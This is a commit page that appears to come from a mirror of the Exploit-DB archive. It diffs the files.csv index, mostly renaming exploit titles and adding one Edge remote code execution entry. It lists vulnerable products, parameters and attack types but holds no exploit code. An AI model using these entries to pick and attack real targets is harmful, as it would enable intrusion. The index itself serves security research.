DB: 2017-01-06

1 new exploits EvansFTP - (EvansFTP.ocx) Remote Buffer Overflow (PoC) EvansFTP - 'EvansFTP.ocx' Remote Buffer Overflow (PoC) Kaspersky 17.0.0 - Local CA root is Incorrectly Protected Kaspersky 17.0.0 - Local CA root Incorrectly Protected CoolPlayer 2.19 - (.Skin) Local Buffer Overflow (Python) CUPS < 1.3.8-4 - (pstopdf filter) Privilege Escalation CoolPlayer 2.19 - '.Skin' Local Buffer Overflow (Python) CUPS < 1.3.8-4 - Privilege Escalation Evans FTP - 'EvansFTP.ocx' ActiveX Control Multiple Remote Buffer Overflow Vulnerabilities Microsoft Windows 10 Edge - 'chakra.dll' Info Leak / Type Confusion Remote Code Execution Phpclanwebsite 1.23.1 - (par) SQL Injection Phpclanwebsite 1.23.1 - SQL Injection Nukedit CMS 4.9.6 - Unauthorized Admin Add Nukedit 4.9.6 - Unauthorized Admin Add iyzi Forum 1.0 Beta 3 - (uye_ayrinti.asp) SQL Injection iyzi Forum 1.0 Beta 3 - SQL Injection Liberum Help Desk 0.97.3 - (details.asp) SQL Injection Liberum Help Desk 0.97.3 - SQL Injection Pligg 9.9.0 - Remote Code Execution Pligg 9.9.0 - Cross-Site Scripting / Local File Inclusion / SQL Injection Pligg CMS 9.9.0 - Remote Code Execution Pligg CMS 9.9.0 - Cross-Site Scripting / Local File Inclusion / SQL Injection CF_Auction - (forummessage) Blind SQL Injection CFMBLOG - 'index.cfm categorynbr' Blind SQL Injection CF_Auction - Blind SQL Injection CFMBLOG - 'categorynbr' Parameter Blind SQL Injection phpAddEdit 1.3 - (editform) Local File Inclusion phpAddEdit 1.3 - 'editform' Parameter Local File Inclusion MyCal Personal Events Calendar - 'mycal.mdb' Database Disclosure MyCal Personal Events Calendar - Database Disclosure Affiliate Software Java 4.0 - (Authentication Bypass) SQL Injection Ad Management Java - (Authentication Bypass) SQL Injection Banner Exchange Java - (Authentication Bypass) SQL Injection Affiliate Software Java 4.0 - Authentication Bypass Ad Management Java - Authentication Bypass Banner Exchange Java - Authentication Bypass ASP-CMS 1.0 - (index.asp cha) SQL Injection SUMON 0.7.0 - (chg.php host) Command Execution Xpoze 4.10 - (home.html menu) Blind SQL Injection Social Groupie - 'group_index.php id' SQL Injection ASP-CMS 1.0 - 'cha' Parameter SQL Injection SUMON 0.7.0 - Command Execution Xpoze 4.10 - 'menu' Parameter Blind SQL Injection Social Groupie - 'id' Parameter SQL Injection Umer Inc Songs Portal Script - 'id' SQL Injection Umer Inc Songs Portal Script - 'id' Parameter SQL Injection ASPired2Quote - 'quote.mdb' Remote Database Disclosure ASP-DEV Internal E-Mail System - (Authentication Bypass) SQL Injection ASPired2Quote - Remote Database Disclosure ASP-DEV Internal E-Mail System - Authentication Bypass iyzi Forum 1.0b3 - (iyziforum.mdb) Database Disclosure CodeAvalanche FreeForum - 'CAForum.mdb' Database Disclosure iyzi Forum 1.0b3 - Database Disclosure CodeAvalanche FreeForum - Database Disclosure FLDS 1.2a - (redir.php id) SQL Injection FLDS 1.2a - 'redir.php' SQL Injection Mediatheka 4.2 - (index.php lang) Local File Inclusion Mediatheka 4.2 - 'lang' Parameter Local File Inclusion Forest Blog 1.3.2 - (blog.mdb) Remote Database Disclosure CodeAvalanche Directory - 'CADirectory.mdb' Database Disclosure CodeAvalanche FreeForAll - 'CAFFAPage.mdb' Database Disclosure Forest Blog 1.3.2 - Remote Database Disclosure CodeAvalanche Directory - Database Disclosure CodeAvalanche FreeForAll - Database Disclosure CodeAvalanche Articles - 'CAArticles.mdb' Database Disclosure CodeAvalanche RateMySite - 'CARateMySite.mdb' Database Disclosure CodeAvalanche Articles - Database Disclosure CodeAvalanche RateMySite - Database Disclosure FLDS 1.2a - (lpro.php id) SQL Injection BabbleBoard 1.1.6 - 'Username' Cross-Site Request Forgery/Cookie Grabber Exploit FLDS 1.2a - 'lpro.php' SQL Injection BabbleBoard 1.1.6 - Cross-Site Request Forgery/Cookie Grabber Exploit The Rat CMS Alpha 2 - (Authentication Bypass) SQL Injection XOOPS Module Amevents - 'print.php id' SQL Injection CadeNix - 'cid' SQL Injection The Rat CMS Alpha 2 - Authentication Bypass XOOPS Module Amevents - SQL Injection CadeNix - SQL Injection CFAGCMS 1 - 'right.php title' SQL Injection CFAGCMS 1 - SQL Injection FaScript FaUpload - 'download.php' SQL Injection Web Wiz Guestbook 8.21 - (WWGGuestbook.mdb) DD FLDS 1.2a - report.php (linkida) SQL Injection FaScript FaUpload - SQL Injection Web Wiz Guestbook 8.21 - Database Disclosure FLDS 1.2a - 'report.php' SQL Injection Gnews Publisher .NET - (authors.asp authorID) SQL Injection Gnews Publisher .NET - SQL Injection Joomla! Component Tech Article 1.x - (item) SQL Injection TinyMCE 2.0.1 - (index.php menuID) SQL Injection Joomla! Component Tech Article 1.x - SQL Injection TinyMCE 2.0.1 - 'menuID' Parameter SQL Injection QuickerSite Easy CMS - 'QuickerSite.mdb' Database Disclosure QuickerSite Easy CMS - Database Disclosure I-Rater Basic - 'messages.php' SQL Injection I-Rater Basic - SQL Injection Injader CMS 2.1.1 - 'id' SQL Injection Injader CMS 2.1.1 - 'id' Parameter SQL Injection MyPHPsite - 'index.php mod' Local File Inclusion MyPBS - 'index.php seasonID' SQL Injection MyPHPsite - Local File Inclusion MyPBS - 'seasonID' Parameter SQL Injection Extract Website - 'download.php Filename' File Disclosure Extract Website - 'Filename' Parameter File Disclosure FreeLyrics 1.0 - (source.php p) Remote File Disclosure FreeLyrics 1.0 - Remote File Disclosure Userlocator 3.0 - (y) Blind SQL Injection Userlocator 3.0 - Blind SQL Injection chicomas 2.0.4 - Database Backup / File Disclosure / Cross-Site Scripting Chicomas 2.0.4 - Database Backup / File Disclosure / Cross-Site Scripting BLOG 1.55B - (image_upload.php) Arbitrary File Upload BLOG 1.55B - 'image_upload.php' Arbitrary File Upload RSS Simple News - 'news.php pid' SQL Injection Text Lines Rearrange Script - 'Filename' File Disclosure RSS Simple News - SQL Injection Text Lines Rearrange Script - 'Filename' Parameter File Disclosure Pligg 9.9.5b - (check_url.php url) Arbitrary File Upload / SQL Injection Pligg 9.9.5b - Arbitrary File Upload / SQL Injection Joomla! Component Volunteer 2.0 - (job_id) SQL Injection Joomla! Component Volunteer 2.0 - SQL Injection Calendar Script 1.1 - (Authentication Bypass) SQL Injection REDPEACH CMS - (zv) SQL Injection Calendar Script 1.1 - Authentication Bypass REDPEACH CMS - SQL Injection PHPLD 3.3 - (page.php name) Blind SQL Injection PHPLD 3.3 - Blind SQL Injection The Rat CMS Alpha 2 - 'viewarticle.php id' Blind SQL Injection The Rat CMS Alpha 2 - Blind SQL Injection Pligg 9.9.5 - Cross-Site Request Forgery / Protection Bypass / Captcha Bypass Pligg CMS 9.9.5 - Cross-Site Request Forgery / Protection Bypass / Captcha Bypass Flatnux 2009-01-27 - (Job fields) Cross-Site Scripting / Iframe Injection (PoC) Flatnux 2009-01-27 - Cross-Site Scripting / Iframe Injection (PoC) flatnux 2009-01-27 - Remote File Inclusion Flatnux 2009-01-27 - Remote File Inclusion flatnux 2009-03-27 - Arbitrary File Upload / Information Disclosure Flatnux 2009-03-27 - Arbitrary File Upload / Information Disclosure Pligg 9.9.0 - (editlink.php id) Blind SQL Injection Pligg CMS 9.9.0 - 'editlink.php' Blind SQL Injection CF Shopkart 5.3x - 'itemID' SQL Injection CF Shopkart 5.3x - 'itemID' Parameter SQL Injection worksimple_1.3.2 - Multiple Vulnerabilities WorkSimple 1.3.2 - Multiple Vulnerabilities Pligg 1.1.2 - Blind SQL Injection / Cross-Site Scripting Pligg CMS 1.1.2 - Blind SQL Injection / Cross-Site Scripting Constructr CMS 3.03 - MultipleRemote Vulnerabilities Constructr CMS 3.03 - Multiple Remote Vulnerabilities Pligg 1.1.4 - SQL Injection Pligg CMS 1.1.4 - SQL Injection phpLDAPadmin 1.2.1.1 - (query_engine) Remote PHP Code Injection (1) phpLDAPadmin 1.2.1.1 - Remote PHP Code Injection (1) phpLDAPadmin 1.2.1.1 - (query_engine) Remote PHP Code Injection (Metasploit) (2) phpLDAPadmin 1.2.1.1 - Remote PHP Code Injection (Metasploit) (2) OneOrZero Helpdesk 1.4 - TUpdate.php SQL Injection OneOrZero Helpdesk 1.4 - install.php Administrative Access OneOrZero Helpdesk 1.4 - 'TUpdate.php' SQL Injection OneOrZero Helpdesk 1.4 - 'install.php' Administrative Access phpLDAPadmin 0.9.6/0.9.7 - welcome.php custom_welcome_page Variable Arbitrary File Inclusion phpLDAPadmin 0.9.6/0.9.7 - 'welcome.php' Arbitrary File Inclusion phpLDAPadmin 0.9.8 - compare_form.php dn Parameter Cross-Site Scripting phpLDAPadmin 0.9.8 - copy_form.php dn Parameter Cross-Site Scripting phpLDAPadmin 0.9.8 - rename_form.php dn Parameter Cross-Site Scripting phpLDAPadmin 0.9.8 - 'compare_form.php' Cross-Site Scripting phpLDAPadmin 0.9.8 - 'copy_form.php' Cross-Site Scripting phpLDAPadmin 0.9.8 - 'rename_form.php' Cross-Site Scripting phpLDAPadmin 0.9.8 - search.php scope Parameter Cross-Site Scripting phpLDAPadmin 0.9.8 - template_engine.php Multiple Parameter Cross-Site Scripting phpLDAPadmin 0.9.8 - 'search.php' Cross-Site Scripting phpLDAPadmin 0.9.8 - 'template_engine.php' Cross-Site Scripting Pligg 9.5 - Reset Forgotten Password Security Bypass Pligg CMS 9.5 - Reset Forgotten Password Security Bypass Click&BaneX - Details.asp SQL Injection Click&BaneX - 'Details.asp' SQL Injection ChiCoMaS 2.0.4 - 'index.php' Cross-Site Scripting Chicomas 2.0.4 - 'index.php' Cross-Site Scripting Pligg 9.9.5 - 'CAPTCHA' Registration Automation Security Bypass Pligg CMS 9.9.5 - 'CAPTCHA' Registration Automation Security Bypass Pligg 1.0.4 - 'search.php' Cross-Site Scripting Pligg CMS 1.0.4 - 'search.php' Cross-Site Scripting Pligg 2.0.1 - Multiple Vulnerabilities Pligg CMS 2.0.1 - Multiple Vulnerabilities Open Journal Systems (OJS) 2.3.6 - /lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/ibrowser.php Multiple Parameter Cross-Site Scripting Open Journal Systems (OJS) 2.3.6 - /lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/rfiles.php Multiple Function Traversal Arbitrary File Manipulation Open Journal Systems (OJS) 2.3.6 - 'rfiles.php' Traversal Arbitrary File Manipulation FlatnuX CMS - controlcenter.php contents/Files Action dir Parameter Traversal Arbitrary File Access FlatnuX CMS - Traversal Arbitrary File Access Atlassian Confluence Jira 5.9.12 - Persistent Cross-Site Scripting Atlassian Confluence 5.9.12 - Persistent Cross-Site Scripting
2017-01-06 05:01:17 +00:00 · 2017-01-06 05:01:17 +00:00 · 127a1da37b
commit 127a1da37b
parent 0d43a7fe09
5 changed files with 117 additions and 120 deletions
--- a/files.csv
+++ b/files.csv
@ -875,7 +875,7 @@ id,file,description,date,author,platform,type,port
 7405,platforms/linux/dos/7405.c,"Linux Kernel 2.6.27.8 - ATMSVC Local Denial of Service",2008-12-10,"Jon Oberheide",linux,dos,0
 7431,platforms/windows/dos/7431.pl,"Microsoft Visual Basic - ActiveX Controls mscomct2.ocx Buffer Overflow (PoC)",2008-12-12,"Jerome Athias",windows,dos,0
 7454,platforms/linux/dos/7454.c,"Linux Kernel 2.6.27.7-generic / 2.6.18 / 2.6.24-1 - Local Denial of Service",2008-12-14,Adurit-T,linux,dos,0
-7460,platforms/windows/dos/7460.html,"EvansFTP - (EvansFTP.ocx) Remote Buffer Overflow (PoC)",2008-12-14,Bl@ckbe@rD,windows,dos,0
+7460,platforms/windows/dos/7460.html,"EvansFTP - 'EvansFTP.ocx' Remote Buffer Overflow (PoC)",2008-12-14,Bl@ckbe@rD,windows,dos,0
 7467,platforms/multiple/dos/7467.txt,"Amaya Web Browser 10.0.1/10.1-pre5 - (html tag) Buffer Overflow (PoC)",2008-12-15,webDEViL,multiple,dos,0
 7520,platforms/multiple/dos/7520.c,"Avahi < 0.6.24 - (mDNS Daemon) Remote Denial of Service",2008-12-19,"Jon Oberheide",multiple,dos,0
 7535,platforms/hardware/dos/7535.php,"Linksys WAG54G v2 (Wireless ADSL Router) - httpd Denial of Service",2008-12-21,r0ut3r,hardware,dos,0
@ -5925,7 +5925,7 @@ id,file,description,date,author,platform,type,port
 7135,platforms/windows/local/7135.htm,"Opera 9.62 - 'file://' Local Heap Overflow",2008-11-17,"Guido Landi",windows,local,0
 7171,platforms/multiple/local/7171.txt,"PHP 5.2.6 - (error_log) Safe_mode Bypass",2008-11-20,SecurityReason,multiple,local,0
 7177,platforms/linux/local/7177.c,"Oracle Database Vault - ptrace(2) Privilege Escalation",2008-11-20,"Jakub Wartak",linux,local,0
-40988,platforms/windows/local/40988.c,"Kaspersky 17.0.0 - Local CA root is Incorrectly Protected",2017-01-04,"Google Security Research",windows,local,0
+40988,platforms/windows/local/40988.c,"Kaspersky 17.0.0 - Local CA root Incorrectly Protected",2017-01-04,"Google Security Research",windows,local,0
 7264,platforms/windows/local/7264.txt,"Apache Tomcat (Windows) - runtime.getRuntime().exec() Privilege Escalation",2008-11-28,Abysssec,windows,local,0
 7309,platforms/windows/local/7309.pl,"Cain & Abel 4.9.24 - '.rdp' Stack Overflow",2008-11-30,SkD,windows,local,0
 7313,platforms/linux/local/7313.sh,"Debian - (symlink attack in login) Arbitrary File Ownership (PoC)",2008-12-01,"Paul Szabo",linux,local,0
@ -5939,8 +5939,8 @@ id,file,description,date,author,platform,type,port
 7516,platforms/windows/local/7516.txt,"ESET Smart Security 3.0.672 - 'epfw.sys' Privilege Escalation",2008-12-18,"NT Internals",windows,local,0
 7533,platforms/windows/local/7533.txt,"PowerStrip 3.84 - 'pstrip.sys' Privilege Escalation",2008-12-21,"NT Internals",windows,local,0
 7536,platforms/windows/local/7536.cpp,"CoolPlayer 2.19 - '.Skin' Local Buffer Overflow",2008-12-21,r0ut3r,windows,local,0
-7547,platforms/windows/local/7547.py,"CoolPlayer 2.19 - (.Skin) Local Buffer Overflow (Python)",2008-12-22,Encrypt3d.M!nd,windows,local,0
-7550,platforms/multiple/local/7550.c,"CUPS < 1.3.8-4 - (pstopdf filter) Privilege Escalation",2008-12-22,"Jon Oberheide",multiple,local,0
+7547,platforms/windows/local/7547.py,"CoolPlayer 2.19 - '.Skin' Local Buffer Overflow (Python)",2008-12-22,Encrypt3d.M!nd,windows,local,0
+7550,platforms/multiple/local/7550.c,"CUPS < 1.3.8-4 - Privilege Escalation",2008-12-22,"Jon Oberheide",multiple,local,0
 7577,platforms/windows/local/7577.pl,"Acoustica Mixcraft 4.2 - Universal Stack Overflow (SEH)",2008-12-24,SkD,windows,local,0
 7581,platforms/freebsd/local/7581.c,"FreeBSD 6x/7 - protosw kernel Local Privilege Escalation Exploit",2008-12-28,"Don Bailey",freebsd,local,0
 7582,platforms/windows/local/7582.py,"IntelliTamper 2.07/2.08 - '.map' Local Overwrite (SEH)",2008-12-28,Cnaph,windows,local,0
@ -14083,7 +14083,6 @@ id,file,description,date,author,platform,type,port
 32618,platforms/php/remote/32618.txt,"plexusCMS 0.5 - Cross-Site Scripting / Remote Shell / Credentials Leak",2014-03-31,neglomaniac,php,remote,0
 32643,platforms/windows/remote/32643.txt,"PhonerLite 2.14 SIP Soft Phone - SIP Digest Disclosure",2014-04-01,"Jason Ostrom",windows,remote,5060
 32654,platforms/windows/remote/32654.txt,"Microsoft Internet Explorer 8 - CSS 'expression' Property Cross-Site Scripting Filter Bypass",2008-12-11,"Rafel Ivgi",windows,remote,0
-32661,platforms/windows/remote/32661.html,"Evans FTP - 'EvansFTP.ocx' ActiveX Control Multiple Remote Buffer Overflow Vulnerabilities",2008-12-14,Bl@ckbe@rD,windows,remote,0
 32673,platforms/multiple/remote/32673.java,"GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy Weakness (1)",2008-12-05,"Jack Lloyd",multiple,remote,0
 32674,platforms/multiple/remote/32674.cpp,"GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy Weakness (2)",2008-12-05,"Jack Lloyd",multiple,remote,0
 32681,platforms/hardware/remote/32681.txt,"COMTREND CT-536 / HG-536 Routers - Multiple Remote Vulnerabilities",2008-12-22,"Daniel Fernandez Bleda",hardware,remote,0
@ -15200,6 +15199,7 @@ id,file,description,date,author,platform,type,port
 40949,platforms/cgi/remote/40949.rb,"NETGEAR WNR2000v5 - Remote Code Execution",2016-12-21,"Pedro Ribeiro",cgi,remote,80
 40963,platforms/linux/remote/40963.txt,"OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading",2016-12-23,"Google Security Research",linux,remote,22
 40984,platforms/windows/remote/40984.py,"Internet Download Accelerator 6.10.1.1527 - FTP Buffer Overflow (SEH)",2017-01-02,"Fady Mohammed Osman",windows,remote,0
+40990,platforms/windows/remote/40990.txt,"Microsoft Windows 10 Edge - 'chakra.dll' Info Leak / Type Confusion Remote Code Execution",2017-01-05,"Brian Pak",windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -16028,7 +16028,7 @@ id,file,description,date,author,platform,type,port
 1419,platforms/asp/webapps/1419.pl,"MiniNuke 1.8.2 - 'hid' Parameter SQL Injection",2006-01-14,DetMyl,asp,webapps,0
 1442,platforms/php/webapps/1442.pl,"EZDatabase 2.0 - (db_id) Remote Command Execution",2006-01-22,cijfer,php,webapps,0
 1446,platforms/php/webapps/1446.pl,"creLoaded 6.15 - (HTMLAREA) Automated Perl Exploit",2006-01-24,kaneda,php,webapps,0
-1453,platforms/php/webapps/1453.pl,"Phpclanwebsite 1.23.1 - (par) SQL Injection",2006-01-25,matrix_killer,php,webapps,0
+1453,platforms/php/webapps/1453.pl,"Phpclanwebsite 1.23.1 - SQL Injection",2006-01-25,matrix_killer,php,webapps,0
 1457,platforms/php/webapps/1457.txt,"phpBB 2.0.19 - Cross-Site Scripting Remote Cookie Disclosure",2006-01-29,threesixthousan,php,webapps,0
 1459,platforms/php/webapps/1459.pl,"xeCMS 1.0.0 RC 2 - 'cookie' Remote Command Execution",2006-01-30,cijfer,php,webapps,0
 1461,platforms/php/webapps/1461.pl,"Invision Power Board Dragoran Portal Mod 1.3 - SQL Injection",2006-01-31,SkOd,php,webapps,0
@ -16251,7 +16251,7 @@ id,file,description,date,author,platform,type,port
 1847,platforms/php/webapps/1847.txt,"CosmicShoppingCart - 'search.php' SQL Injection",2006-05-28,Vympel,php,webapps,0
 1848,platforms/php/webapps/1848.txt,"Fastpublish CMS 1.6.9 - config[fsBase] Remote File Inclusion",2006-05-29,Kacper,php,webapps,0
 1849,platforms/asp/webapps/1849.htm,"Speedy ASP Forum - 'profileupdate.asp' User Pass Change Exploit",2006-05-29,ajann,asp,webapps,0
-1850,platforms/asp/webapps/1850.htm,"Nukedit CMS 4.9.6 - Unauthorized Admin Add",2006-05-29,FarhadKey,asp,webapps,0
+1850,platforms/asp/webapps/1850.htm,"Nukedit 4.9.6 - Unauthorized Admin Add",2006-05-29,FarhadKey,asp,webapps,0
 1851,platforms/php/webapps/1851.txt,"gnopaste 0.5.3 - 'common.php' Remote File Inclusion",2006-05-30,SmokeZ,php,webapps,0
 1853,platforms/php/webapps/1853.php,"pppBlog 0.3.8 - System Disclosure",2006-05-31,rgod,php,webapps,0
 1854,platforms/php/webapps/1854.txt,"Ottoman CMS 1.1.3 - '?default_path=' Remote File Inclusion (1)",2006-05-31,Kacper,php,webapps,0
@ -16669,7 +16669,7 @@ id,file,description,date,author,platform,type,port
 2420,platforms/php/webapps/2420.txt,"ZoomStats 1.0.2 - 'mysql.php' Remote File Inclusion",2006-09-24,Drago84,php,webapps,0
 2421,platforms/asp/webapps/2421.pl,"Spidey Blog Script 1.5 - 'proje_goster.asp' SQL Injection (2)",2006-09-24,gega,asp,webapps,0
 2422,platforms/php/webapps/2422.txt,"Advaced-Clan-Script 3.4 - (mcf.php) Remote File Inclusion",2006-09-24,xdh,php,webapps,0
-2423,platforms/asp/webapps/2423.txt,"iyzi Forum 1.0 Beta 3 - (uye_ayrinti.asp) SQL Injection",2006-09-24,"Fix TR",asp,webapps,0
+2423,platforms/asp/webapps/2423.txt,"iyzi Forum 1.0 Beta 3 - SQL Injection",2006-09-24,"Fix TR",asp,webapps,0
 2424,platforms/php/webapps/2424.txt,"SyntaxCMS 1.3 - (0004_init_urls.php) Remote File Inclusion",2006-09-24,MoHaJaLi,php,webapps,0
 2427,platforms/php/webapps/2427.txt,"Polaring 0.04.03 - (general.php) Remote File Inclusion",2006-09-25,Drago84,php,webapps,0
 2428,platforms/php/webapps/2428.txt,"PBLang 4.66z - (temppath) Remote File Inclusion",2006-09-25,SHiKaA,php,webapps,0
@ -16995,7 +16995,7 @@ id,file,description,date,author,platform,type,port
 2842,platforms/php/webapps/2842.php,"Woltlab Burning Board Lite 1.0.2 - Blind SQL Injection",2006-11-23,rgod,php,webapps,0
 2843,platforms/php/webapps/2843.pl,"PHP-Nuke NukeAI Module 3b - 'util.php' Remote File Inclusion",2006-11-24,DeltahackingTEAM,php,webapps,0
 2844,platforms/php/webapps/2844.pl,"Cahier de texte 2.0 - (Database Backup/Source Disclosure) Remote Exploit",2006-11-24,DarkFig,php,webapps,0
-2846,platforms/asp/webapps/2846.txt,"Liberum Help Desk 0.97.3 - (details.asp) SQL Injection",2006-11-25,ajann,asp,webapps,0
+2846,platforms/asp/webapps/2846.txt,"Liberum Help Desk 0.97.3 - SQL Injection",2006-11-25,ajann,asp,webapps,0
 2847,platforms/php/webapps/2847.txt,"Sisfo Kampus 0.8 - Remote File Inclusion / Download",2006-11-25,"Wawan Firmansyah",php,webapps,0
 2848,platforms/asp/webapps/2848.txt,"Basic Forum 1.1 - (edit.asp) SQL Injection",2006-11-25,bolivar,asp,webapps,0
 2849,platforms/asp/webapps/2849.txt,"ASP-Nuke Community 1.5 - Cookie Privilege Escalation",2006-11-25,ajann,asp,webapps,0
@ -19274,8 +19274,8 @@ id,file,description,date,author,platform,type,port
 6169,platforms/php/webapps/6169.txt,"PozScripts Classified Ads Script - 'cid' Parameter SQL Injection",2008-07-30,"Hussin X",php,webapps,0
 6170,platforms/php/webapps/6170.txt,"TubeGuru Video Sharing Script - 'UID' Parameter SQL Injection",2008-07-30,"Hussin X",php,webapps,0
 6171,platforms/php/webapps/6171.pl,"eNdonesia 8.4 (Calendar Module) - SQL Injection",2008-07-30,Jack,php,webapps,0
-6172,platforms/php/webapps/6172.pl,"Pligg 9.9.0 - Remote Code Execution",2008-07-30,"GulfTech Security",php,webapps,0
-6173,platforms/php/webapps/6173.txt,"Pligg 9.9.0 - Cross-Site Scripting / Local File Inclusion / SQL Injection",2008-07-30,"GulfTech Security",php,webapps,0
+6172,platforms/php/webapps/6172.pl,"Pligg CMS 9.9.0 - Remote Code Execution",2008-07-30,"GulfTech Security",php,webapps,0
+6173,platforms/php/webapps/6173.txt,"Pligg CMS 9.9.0 - Cross-Site Scripting / Local File Inclusion / SQL Injection",2008-07-30,"GulfTech Security",php,webapps,0
 6176,platforms/php/webapps/6176.txt,"PHPX 3.5.16 - Cookie Poisoning / Login Bypass",2008-07-31,gnix,php,webapps,0
 6177,platforms/php/webapps/6177.php,"Symphony 1.7.01 - (non-patched) Remote Code Execution",2008-07-31,Raz0r,php,webapps,0
 6178,platforms/php/webapps/6178.php,"Coppermine Photo Gallery 1.4.18 - Local File Inclusion / Remote Code Execution",2008-07-31,EgiX,php,webapps,0
@ -20216,127 +20216,127 @@ id,file,description,date,author,platform,type,port
 7411,platforms/php/webapps/7411.txt,"Butterfly ORGanizer 2.0.1 - 'id' Parameter SQL Injection",2008-12-10,Osirys,php,webapps,0
 7412,platforms/asp/webapps/7412.txt,"cf shopkart 5.2.2 - SQL Injection / File Disclosure",2008-12-10,AlpHaNiX,asp,webapps,0
 7413,platforms/asp/webapps/7413.pl,"CF_Calendar - 'calendarevent.cfm' SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0
-7414,platforms/asp/webapps/7414.txt,"CF_Auction - (forummessage) Blind SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0
-7415,platforms/asp/webapps/7415.txt,"CFMBLOG - 'index.cfm categorynbr' Blind SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0
+7414,platforms/asp/webapps/7414.txt,"CF_Auction - Blind SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0
+7415,platforms/asp/webapps/7415.txt,"CFMBLOG - 'categorynbr' Parameter Blind SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0
 7416,platforms/asp/webapps/7416.txt,"CF_Forum - Blind SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0
-7417,platforms/php/webapps/7417.txt,"phpAddEdit 1.3 - (editform) Local File Inclusion",2008-12-10,nuclear,php,webapps,0
+7417,platforms/php/webapps/7417.txt,"phpAddEdit 1.3 - 'editform' Parameter Local File Inclusion",2008-12-10,nuclear,php,webapps,0
 7418,platforms/php/webapps/7418.txt,"PhpAddEdit 1.3 - 'cookie' Login Bypass",2008-12-11,x0r,php,webapps,0
 7419,platforms/asp/webapps/7419.txt,"evCal Events Calendar - Database Disclosure",2008-12-11,Cyber-Zone,asp,webapps,0
-7420,platforms/asp/webapps/7420.txt,"MyCal Personal Events Calendar - 'mycal.mdb' Database Disclosure",2008-12-11,CoBRa_21,asp,webapps,0
+7420,platforms/asp/webapps/7420.txt,"MyCal Personal Events Calendar - Database Disclosure",2008-12-11,CoBRa_21,asp,webapps,0
 7421,platforms/php/webapps/7421.txt,"EZ Publish 3.9.0/3.9.5/3.10.1 - Command Execution (Admin Required)",2008-12-11,s4avrd0w,php,webapps,0
 7422,platforms/php/webapps/7422.txt,"Feed CMS 1.07.03.19b - 'lang' Local File Inclusion",2008-12-11,x0r,php,webapps,0
-7423,platforms/asp/webapps/7423.txt,"Affiliate Software Java 4.0 - (Authentication Bypass) SQL Injection",2008-12-11,R3d-D3V!L,asp,webapps,0
-7424,platforms/asp/webapps/7424.txt,"Ad Management Java - (Authentication Bypass) SQL Injection",2008-12-11,R3d-D3V!L,asp,webapps,0
-7425,platforms/asp/webapps/7425.txt,"Banner Exchange Java - (Authentication Bypass) SQL Injection",2008-12-11,R3d-D3V!L,asp,webapps,0
+7423,platforms/asp/webapps/7423.txt,"Affiliate Software Java 4.0 - Authentication Bypass",2008-12-11,R3d-D3V!L,asp,webapps,0
+7424,platforms/asp/webapps/7424.txt,"Ad Management Java - Authentication Bypass",2008-12-11,R3d-D3V!L,asp,webapps,0
+7425,platforms/asp/webapps/7425.txt,"Banner Exchange Java - Authentication Bypass",2008-12-11,R3d-D3V!L,asp,webapps,0
 7426,platforms/php/webapps/7426.txt,"PHP Support Tickets 2.2 - Arbitrary File Upload",2008-12-11,ahmadbady,php,webapps,0
 7427,platforms/asp/webapps/7427.txt,"The Net Guys ASPired2Poll - Remote Database Disclosure",2008-12-11,AlpHaNiX,asp,webapps,0
 7428,platforms/asp/webapps/7428.txt,"The Net Guys ASPired2Protect - Database Disclosure",2008-12-12,AlpHaNiX,asp,webapps,0
-7429,platforms/asp/webapps/7429.txt,"ASP-CMS 1.0 - (index.asp cha) SQL Injection",2008-12-12,"Khashayar Fereidani",asp,webapps,0
-7430,platforms/php/webapps/7430.txt,"SUMON 0.7.0 - (chg.php host) Command Execution",2008-12-12,dun,php,webapps,0
-7432,platforms/php/webapps/7432.txt,"Xpoze 4.10 - (home.html menu) Blind SQL Injection",2008-12-12,XaDoS,php,webapps,0
-7433,platforms/php/webapps/7433.txt,"Social Groupie - 'group_index.php id' SQL Injection",2008-12-12,InjEctOr5,php,webapps,0
+7429,platforms/asp/webapps/7429.txt,"ASP-CMS 1.0 - 'cha' Parameter SQL Injection",2008-12-12,"Khashayar Fereidani",asp,webapps,0
+7430,platforms/php/webapps/7430.txt,"SUMON 0.7.0 - Command Execution",2008-12-12,dun,php,webapps,0
+7432,platforms/php/webapps/7432.txt,"Xpoze 4.10 - 'menu' Parameter Blind SQL Injection",2008-12-12,XaDoS,php,webapps,0
+7433,platforms/php/webapps/7433.txt,"Social Groupie - 'id' Parameter SQL Injection",2008-12-12,InjEctOr5,php,webapps,0
 7434,platforms/php/webapps/7434.sh,"Wysi Wiki Wyg 1.0 - Remote Password Retrieve Exploit",2008-12-12,StAkeR,php,webapps,0
 7435,platforms/php/webapps/7435.txt,"Social Groupie - 'create_album.php' Arbitrary File Upload",2008-12-12,InjEctOr5,php,webapps,0
 7436,platforms/asp/webapps/7436.txt,"the net guys aspired2blog - SQL Injection / File Disclosure",2008-12-12,Pouya_Server,asp,webapps,0
 7437,platforms/php/webapps/7437.txt,"Moodle 1.9.3 - Remote Code Execution",2008-12-12,USH,php,webapps,0
 7438,platforms/asp/webapps/7438.txt,"VP-ASP Shopping Cart 6.50 - Database Disclosure",2008-12-12,Dxil,asp,webapps,0
-7439,platforms/php/webapps/7439.txt,"Umer Inc Songs Portal Script - 'id' SQL Injection",2008-12-12,InjEctOr5,php,webapps,0
+7439,platforms/php/webapps/7439.txt,"Umer Inc Songs Portal Script - 'id' Parameter SQL Injection",2008-12-12,InjEctOr5,php,webapps,0
